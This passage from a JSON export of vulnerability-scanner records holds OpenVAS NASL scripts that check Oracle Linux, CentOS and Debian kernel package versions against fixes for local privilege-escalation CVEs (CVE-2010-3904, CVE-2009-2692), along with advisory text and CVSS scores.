rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:24", "description": "Oracle Linux Local Security Checks ELSA-2010-0792", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-0792", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122303", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0792.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122303\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:20 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0792\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0792 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0792\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0792.html\");\n script_cve_id(\"CVE-2010-3904\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5PAE~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5debug~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.4.0.1.el5xen~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.4.0.1.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:08", "description": "Oracle Linux Local Security Checks ELSA-2010-2010", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2010-2010", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122305", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-2010.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122305\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:16:22 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-2010\");\n script_tag(name:\"insight\", value:\"ELSA-2010-2010 - kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-2010\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-2010.html\");\n script_cve_id(\"CVE-2010-3904\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.1.0.2.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5PAE~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5debug~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"ocfs2\", rpm:\"ocfs2~2.6.18~194.17.1.0.2.el5xen~1.4.7~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5PAE~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5debug~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"oracleasm\", rpm:\"oracleasm~2.6.18~194.17.1.0.2.el5xen~2.0.5~1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:34", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for kernel CESA-2010:0792 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880640", "href": "http://plugins.openvas.org/nasl.php?oid=880640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2010:0792 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issue:\n \n * The rds_page_copy_user() function in the Linux kernel Reliable Datagram\n Sockets (RDS) protocol implementation was missing sanity checks. A local,\n unprivileged user could use this flaw to escalate their privileges.\n (CVE-2010-3904, Important)\n \n Red Hat would like to thank Dan Rosenberg of Virtual Security Research for\n reporting this issue.\n \n Users should upgrade to these updated packages, which contain a backported\n patch to correct this issue. The system must be rebooted for this update to\n take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\");\n script_id(880640);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0792\");\n script_cve_id(\"CVE-2010-3904\");\n script_name(\"CentOS Update for kernel CESA-2010:0792 centos5 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~194.17.4.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:40", "description": "The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1864-1 (linux-2.6.24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:64747", "href": "http://plugins.openvas.org/nasl.php?oid=64747", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1864_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1864-1 (linux-2.6.24)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered in the Linux kernel that may lead\nto privilege escalation. The Common Vulnerabilities and Exposures\nproject identifies the following problem:\n\nCVE-2009-2692\n\nTavis Ormandy and Julien Tinnes discovered an issue with how the\nsendpage function is initialized in the proto_ops structure.\nLocal users can exploit this vulnerability to gain elevated\nprivileges.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 2.6.24-6~etchnhalf.8etch3.\n\nWe recommend that you upgrade your linux-2.6.24 packages.\";\ntag_summary = \"The remote host is missing an update to linux-2.6.24\nannounced via advisory DSA 1864-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201864-1\";\n\n\nif(description)\n{\n script_id(64747);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1864-1 (linux-2.6.24)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-support-2.6.24-etchnhalf.1\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-patch-debian-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-tree-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-alpha\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-common\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 